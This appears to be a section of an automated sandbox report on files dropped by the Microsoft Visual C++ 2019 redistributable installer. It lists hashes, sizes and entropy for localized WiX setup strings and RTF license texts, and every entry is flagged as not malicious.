                                                                        SHA-256:07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
                                                                        SHA-512:FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive | /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11936
                                                                        Entropy (8bit):5.194264396634094
                                                                        Encrypted:false
                                                                        SSDEEP:192:+XkOmRUOl6WBsl4kA+sn+mvtI0qHl4qj+iPqk6kVV9iX9GzYNvQ8yOejIpRMrhC2:DDHMFPCeV3i4zOHyOejIpkC2
                                                                        MD5:C2CFA4CE43DFF1FCD200EDD2B1212F0A
                                                                        SHA1:E8286E843192802E5EBF1BE67AE30BCAD75AC4BB
                                                                        SHA-256:F861DB23B972FAAA54520558810387D742878947057CF853DC74E5F6432E6A1B
                                                                        SHA-512:6FDF02A2DC9EF10DD52404F19C300429E7EA40469F00A43CA627F3B7F3868D1724450F99C65B70B9B7B1F2E1FA9D62B8BE1833A8C5AA3CD31C940459F359F30B
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT-SOFTWARE-LIZENZBESTIMMUNGEN\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Diese Lizenzbestimmungen sind ein Vertrag zwischen Ihnen und der Microsoft Corporation (bzw. abh\'e4ngig von Ihrem Wohnsitz einem mit Microsoft verbundenen Unternehmen). Sie gelten f\'fcr die oben angef\'fchrte Software. Die Bestimmungen gelten ebenso f\'fcr jegliche von Microsoft angebotenen Dienste oder Updates f\'fcr die Software, sofern diesen keine anderen Bestimmungen beiliegen.\par..\b SOFERN SIE DIESE LIZENZBESTIMMUNGEN EINHALTEN, SIND SIE ZU FOLGENDEM BERECHTIGT:\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 RECHTE ZUR INSTALLATION UND NUTZUNG. \
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3379
                                                                        Entropy (8bit):5.094097800535488
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOZuesXJhDEVTORNxSMoZN3mteNSiNGNsZuiAXEqicMwhPXbhu9KwKlK8Kq:uDiTl3N7xSbu0N8+AhSNnm
                                                                        MD5:561F3F32DB2453647D1992D4D932E872
                                                                        SHA1:109548642FB7C5CC0159BEDDBCF7752B12B264C0
                                                                        SHA-256:8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
                                                                        SHA-512:CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive | /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11593
                                                                        Entropy (8bit):5.106817099949188
                                                                        Encrypted:false
                                                                        SSDEEP:192:aRAbNYjVk+z5GUSLse5GgALEXmAWL+/3FEShP9sJgi8+Ra8woh+89EQdhwQPely6:K4yrPqm9LcVEg9sVp2ohHVdKoXJXci9a
                                                                        MD5:F0FF747B85B1088A317399B0E11D2101
                                                                        SHA1:F13902A39CEAE703A4713AC883D55CFEE5F1876C
                                                                        SHA-256:4D9B7F06BE847E9E135AB3373F381ED7A841E51631E3C2D16E5C40B535DA3BCF
                                                                        SHA-512:AA850F05571FFC361A764A14CA9C1A465E2646A8307DEEE0589852E6ACC61AF145AEF26B502835724D7245900F9F0D441451DD8C055404788CE64415F5B79506
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMES DU CONTRAT DE LICENCE LOGICIEL MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Les pr\'e9sents termes du contrat de licence constituent un contrat entre Microsoft Corporation (ou, en fonction de votre lieu de r\'e9sidence, l\rquote un de ses affili\'e9s) et vous. Ils s\rquote appliquent au logiciel vis\'e9 ci-dessus. Les termes s\rquote appliquent \'e9galement \'e0 tout service et \'e0 toute mise \'e0 jour Microsoft pour ce logiciel, \'e0 moins que d\rquote autres termes n\rquote accompagnent ces \'e9l\'e9ments.\par..\b SI VOUS VOUS CONFORMEZ AUX PR\'c9SENTS TERMES DU CONTRAT DE LICENCE, VOUS AVEZ LES DROITS CI-DESSOUS.\par....\pard{\pntext\f1\'B7\tab}{\*\pn\pnlvlblt\pnf1\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\s
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3366
                                                                        Entropy (8bit):5.0912204406356905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1BesgKLhD1K8cocDSN3m4NlN2ZfNmXL8ePZFcZkLPqUf9fQKRLKeKqZfj:uDiTlABzH1/qt4qgcXY
                                                                        MD5:7B46AE8698459830A0F9116BC27DE7DF
                                                                        SHA1:D9BB14D483B88996A591392AE03E245CAE19C6C3
                                                                        SHA-256:704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
                                                                        SHA-512:FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive | /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11281
                                                                        Entropy (8bit):5.046489958240229
                                                                        Encrypted:false
                                                                        SSDEEP:192:WBGNX6UXR2+5SmgS/ChMErYkQvowHVw6zdgkycEGCDLQ+n3YJ2d8XSiej+T4Ma8f:gAzSVARBR5jEPLQY3YJpSjTP2
                                                                        MD5:9D98044BAC59684489C4CF66C3B34C85
                                                                        SHA1:36AAE7F10A19D336C725CAFC8583B26D1F5E2325
                                                                        SHA-256:A3F745C01DEA84CE746BA630814E68C7C592B965B048DDC4B1BBE1D6E533BE22
                                                                        SHA-512:D849BBB6C87C182CC98C4E2314C0829BB48BAD483D0CD97BF409E75457C3695049C3A8ADFE865E1ECBC989A910096D2C1CDF333705AAC4D22025DF91B355278E
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 CONTRATTO DI LICENZA PER IL SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario, Tali condizioni si applicano al software Microsoft di cui sopra. Le condizioni si applicano inoltre a qualsiasi servizio o aggiornamento di Microsoft relativo al software, a meno che questo non sia accompagnato da condizioni differenti.\par..\b QUALORA IL LICENZIATARIO SI ATTENGA ALLE PRESENTI CONDIZIONI DI LICENZA, DISPORR\'c0 DEI DIRITTI INDICATI DI SEGUITO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\p
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3319
                                                                        Entropy (8bit):5.019774955491369
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1eesy+hD9BOtBFv5Vo8BbQhMNDJN3msNlNohNNz+wcPclM+PAoYKp+K/u:uDiTlfQvo8WutJ/s9FHNOJp
                                                                        MD5:D90BC60FA15299925986A52861B8E5D5
                                                                        SHA1:FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
                                                                        SHA-256:0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
                                                                        SHA-512:11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):28232
                                                                        Entropy (8bit):3.7669201853275722
                                                                        Encrypted:false
                                                                        SSDEEP:192:Qkb65jNkzrUJVbpEiTskXHH1AZWoJxfnVnkDYUqfQFXBue6hX2JSfR7q05kWZxhY:epCD3y/ybox2yrk2
                                                                        MD5:8C49936EC4CF0F64CA2398191C462698
                                                                        SHA1:CC069FE8F8BC3B6EE2085A4EACF40DB26C842BAC
                                                                        SHA-256:7355367B7C48F1BBACC66DFFE1D4BF016C16156D020D4156F288C2B2207ED1C2
                                                                        SHA-512:4381147FF6707C3D31C5AE591F68BC61897811112CB507831EFF5E71DD281009400EDA3300E7D3EFDE3545B89BCB71F2036F776C6FDFC73B6B2B2B8FBC084499
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3959
                                                                        Entropy (8bit):5.955167044943003
                                                                        Encrypted:false
                                                                        SSDEEP:96:uDiTlDuB1n+RNmvFo6bnpojeTPk0R/vueX5OA17IHdGWz:5uB1+gD1DU4EdGE
                                                                        MD5:DC81ED54FD28FC6DB6F139C8DA1BDED6
                                                                        SHA1:9C719C32844F78AAE523ADB8EE42A54D019C2B05
                                                                        SHA-256:6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
                                                                        SHA-512:FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):27936
                                                                        Entropy (8bit):3.871317037004171
                                                                        Encrypted:false
                                                                        SSDEEP:384:kKIgbA2uBsarNG/HxPvCL1ewjxsXmEw4C7C7R4jAeqCBO968y7yNRylBSFfQv9yH:d3ar8Xa/XAeqoc0wfBB4qN
                                                                        MD5:184D94082717E684EAF081CEC3CBA4B1
                                                                        SHA1:960B9DA48F4CDDF29E78BBAE995B52204B26D51B
                                                                        SHA-256:A4C25DA9E3FBCED47464152C10538F16EE06D8E06BC62E1CF4808D293AA1AFA2
                                                                        SHA-512:E4016C0CA348299B5EF761F456E3B5AD9B99E5E100C07ACAB1369DFEC214E75AA88E9AD2A0952C0CC1B707E2732779E6E3810B3DA6C839F0181DC81E3560CBDA
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3249
                                                                        Entropy (8bit):5.985100495461761
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
                                                                        MD5:B3399648C2F30930487F20B50378CEC1
                                                                        SHA1:CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
                                                                        SHA-256:AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
                                                                        SHA-512:C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13265
                                                                        Entropy (8bit):5.358483628484379
                                                                        Encrypted:false
                                                                        SSDEEP:192:TKpWRd0NE41Y/od7V/sHFos7YLQY9DbLM5D+Vw1VAOb0P4/sHLS7VHwHMPw95a+Q:uy0CG9KZ7qQCw1VAOZ/sHOJfcY2wf6p2
                                                                        MD5:5B9DF97FC98938BF2936437430E31ECA
                                                                        SHA1:AB1DA8FECDF85CF487709774033F5B4B79DFF8DE
                                                                        SHA-256:8CB5EB330AA07ACCD6D1C8961F715F66A4F3D69FB291765F8D9F1850105AF617
                                                                        SHA-512:4EF61A484DF85C487BE326AB4F95870813B9D0644DF788CE22D3BEB6E062CDF80732CB0B77FCDA5D4C951A0D67AECF8F5DCD94EA6FA028CFCA11D85AA97714E3
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3212
                                                                        Entropy (8bit):5.268378763359481
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
                                                                        MD5:15172EAF5C2C2E2B008DE04A250A62A1
                                                                        SHA1:ED60F870C473EE87DF39D1584880D964796E6888
                                                                        SHA-256:440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
                                                                        SHA-512:48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10656
                                                                        Entropy (8bit):5.092962528947159
                                                                        Encrypted:false
                                                                        SSDEEP:192:WIPAufWXXF0+YkR6E0/CiTS0CsGlHIMqf29H7KxLY/aYzApT3anawLXCBX2:VPAufb+YSSCYrCb5BmW4UDaTqzLwX2
                                                                        MD5:360FC4A7FFCDB915A7CF440221AFAD36
                                                                        SHA1:009F36BBDAD5B9972E8069E53855FC656EA05800
                                                                        SHA-256:9BF79B54F4D62BE501FF53EEDEB18683052A4AE38FF411750A764B3A59077F52
                                                                        SHA-512:9550A99641F194BB504A76DE011D07C1183EE1D83371EE49782FC3D05BF779415630450174DD0C03CB182A5575F6515012337B899E2D084203717D9F110A6FFE
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3095
                                                                        Entropy (8bit):5.150868216959352
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
                                                                        MD5:BE27B98E086D2B8068B16DBF43E18D50
                                                                        SHA1:6FAF34A36C8D9DE55650D0466563852552927603
                                                                        SHA-256:F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
                                                                        SHA-512:3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):31915
                                                                        Entropy (8bit):3.6440775919653996
                                                                        Encrypted:false
                                                                        SSDEEP:384:ntaMxngQEqQUaAEJxkSjjujcme51oVwuZOFsrnkGxunWxGc9wtvVYgCzkSxN1S2:npgnmWWNEvVYgCzxD
                                                                        MD5:A59C893E2C2B4063AE821E42519F9812
                                                                        SHA1:C00D0B11F6B25246357053F6620E57D990EFC698
                                                                        SHA-256:0EC8368E87B3DFC92141885A2930BDD99371526E09FC52B84B764C91C5FC47B8
                                                                        SHA-512:B9AD8223DDA2208EC2068DBB85742A03BE0291942E60D4498E3DAB4DDF559AA6DCF9879952F5819223CFC5F4CB71D4E06E4103E129727AACFB8EFE48403A04FA
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4150
                                                                        Entropy (8bit):5.444436038992627
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
                                                                        MD5:17C652452E5EE930A7F1E5E312C17324
                                                                        SHA1:59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
                                                                        SHA-256:7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
                                                                        SHA-512:53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13379
                                                                        Entropy (8bit):5.214715951393874
                                                                        Encrypted:false
                                                                        SSDEEP:192:1fGkc01jIjZTUDUTvXt2QpfC5VAlCPpDwuOfH7df3YwnnbZIWG2XjQeoO9uBO8CA:Iiqx4Uh2QpMVA8haDdv9nbZzG6oQR2
                                                                        MD5:BD2DC15DFEE66076BBA6D15A527089E7
                                                                        SHA1:8768518F2318F1B8A3F8908A056213042A377CC4
                                                                        SHA-256:62A07232017702A32F4B6E43E9C6F063B67098A1483EEDDB31D7C73EAF80A6AF
                                                                        SHA-512:9C9467A2F2D0886FF4302A44AEA89734FCEFBD3CBE04D895BCEACBA1586AB746E62391800E07B6228E054014BE51F14FF63BA71237268F94019063C8C8B7EF74
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3221
                                                                        Entropy (8bit):5.280530692056262
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
                                                                        MD5:DEFBEA001DC4EB66553630AC7CE47CCA
                                                                        SHA1:90CED64EC7C861F03484B5D5616FDBCDA8F64788
                                                                        SHA-256:E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
                                                                        SHA-512:B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):17863
                                                                        Entropy (8bit):3.9617786349452775
                                                                        Encrypted:false
                                                                        SSDEEP:192:BxoqPyOj+/8Tk5VigWgijAlk5xWvSCI5lgios0EhGXxGMLVGW+uUoqyLZDvAJxMx:vbIeaE7q3KGgzD2
                                                                        MD5:3CF16377C0D1B2E16FFD6E32BF139AC5
                                                                        SHA1:D1A8C3730231D51C7BB85A7A15B948794E99BDCE
                                                                        SHA-256:E95CA64C326A0EF7EF3CED6CDAB072509096356C15D1761646E3C7FDA744D0E0
                                                                        SHA-512:E9862FD0E8EC2B2C2180183D06535A16A527756F6907E6A1D2DB85092636F72C497508E793EE8F2CC8E0D1A5E090C6CCF465F78BC1FA8E68DAF7C68815A0EE16
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset134 SimSun;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'ce\'a2\'c8\'ed\'c8\'ed\'bc\'fe\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\f1\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f0\'d5\'e2\'d0\'a9\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\'ca\'c7\f1 Microsoft Corporation\f0\'a3\'a8\'bb\'f2\'c4\'fa\'cb\'f9\'d4\'da\'b5\'d8\'b5\'c4\f1 Microsoft \f0\'b9\'d8\'c1\'aa\'b9\'ab\'cb\'be\'a3\'a9\'d3\'eb\'c4\'fa\'d6\'ae\'bc\'e4\'b4\'ef\'b3\'c9\'b5\'c4\'d0\'ad\'d2\'e9\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'ca\'ca\'d3\'c3\'d3\'da\'c9\'cf\'ca\'f6\'c8\'ed\'bc\'fe\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'d2\'b2\'ca\'ca\'d3\'c3\'d3\'da\'d5\'eb\'b6\'d4\'b8\'c3\'c8\'ed\'bc\'fe\'b5\'c4\'c8\'ce\'ba\'ce\'ce\'a2\'c8\'ed\'b7\'fe\'ce\'f1\'bb\'f2\'b8\'fc\'d0\'c2\'a3\'ac\'b5\'ab\'d3\'d0\'b2\'bb\'cd\
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2978
                                                                        Entropy (8bit):6.135205733555905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
                                                                        MD5:3D1E15DEEACE801322E222969A574F17
                                                                        SHA1:58074C83775E1A884FED6679ACF9AC78ABB8A169
                                                                        SHA-256:2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
                                                                        SHA-512:10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">......</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [..] - .......... ..................Install ........../passive | /quiet - ..... UI ......... UI ... ........ UI ........../norestart - ..................... UI.../log log.txt - ............. %TEMP% ...
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10714
                                                                        Entropy (8bit):5.122578090102117
                                                                        Encrypted:false
                                                                        SSDEEP:192:WthGE/9wd8eQF/hJOmQeNrXT77uOlQ+v3AqHqc3wpXGYdjvsk2cwBb2:mhGuhj+ed388Bb2
